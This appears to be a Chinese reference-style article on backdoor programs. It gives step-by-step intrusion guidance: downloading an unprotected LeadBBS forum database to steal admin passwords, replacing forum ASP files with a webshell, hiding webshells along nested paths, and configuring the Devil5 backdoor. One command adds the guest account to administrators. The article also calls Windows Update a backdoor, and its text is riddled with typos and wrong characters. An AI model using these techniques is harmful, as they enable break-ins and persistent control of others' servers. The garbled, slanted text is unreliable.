系统配置都相对安全，公开的存在的机会很少，于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序)，然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码，然后通过WEB访问这个程序，就能很方便地查阅服务器上的资料了，下面举个简单的便子(由于只是简单的介绍，下文便子不会太难或者太普遍，希望大家理解)。
leadbbs2.77曾经风靡网络，它是个很典型的ASP论坛，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的总是喜欢默认安装，然后启用论坛，我们只需要很简单地在IE中输入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了，而且没有MD5加密哦!，我们直接找到管理员的账户和密码，然后登录论坛，到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定程序、远程等，这样一个隐藏的后门就建好了!取得的SYSTEM权限就看大家自己的办法了。
一般来讲，海洋的功能是非常强大的，而且不容易被查杀(一个朋友采取的方式是：先利用某个脚本漏洞上传，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的)，如果管理员觉得自己可能中了这里边样的后门，可以利用论坛备份来恢复自己的页面系统，再配合、论坛日志等程序检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。
脚本方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防论坛也收录了这三种后门，大家可以下载后自己研究。
后门程序devil5
类型：系统后门
使用范围：win200/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程序：★★★★☆
查杀难度：★★★☆☆
同BITS一样，Devil5也是插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。
我们用TELNET连接上去，连接的格式是：TELNET *** 定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次也是分开的，必须要每次都有输入密码，比如我们丢掉了和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上“&密码”就可以了：net localgroup administrators guest /add &hkfx，然后你又可以控制服务器了。
很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具DELDEVIL5.exe，帮助防护者清理系统;而且它可以任意改名和绑定，使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外，PortLess BackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。
后门程序root kit
如果说上面的后门程序都各有千秋、各有所长的话，它们和经典的root kit 一比简直就是小巫见大巫了，那究竟什么样是root kit呢?
root kit出现于20世纪90年代初，在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今，root kit 的非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。
很多人有一个误解，他们认为root kit 是用作获得系统root访问权限的工具。实际上，root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，进入系统后，攻击者会在侵入的主机中安装root kit，然后他将经常通过root kit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后，攻击者就会利用这些信息侵入其他系统。
从*nix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!网络上常见的root kit 是级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。程序安装隐藏后门，注册隐藏并且驱动。该后门技术允许植入reDirector，是非常难以查杀的一个东东，让很多网络管员非常头疼!
后门程序著名后门
Windows Update
最著名的后门程序，该算是微软的Windows Update了。Windows Update的动作不外乎以下三个：开机时自动连上微软的网站，将电脑的现况报告给网站以进行处理，网站通过Windows Update程序通知使用者是否有必须更新的文件，以及如何更新。如果我们针对这些动作进行分析，则“开机时自动连上微软网站”的动作就是后门程序特性中的“潜伏”，而“将电脑现况报告”的动作是“搜集信息”。因此，虽然微软“信誓旦旦”地说它不会搜集个人电脑中的信息，但如果我们从Windows Update来进行分析的话，就会发现它必须搜集个人电脑的信息才能进行操作，所差者只是搜集了哪些信息而已。
恒盛杰资讯．黑客攻防从入门到精通．北京：机械工业出版社，2014.3
黑客防线编辑部．黑客防线．北京：电子工业出版社，2010
中国通信学会是全国通信...
提供资源类型：内容
清除历史记录关闭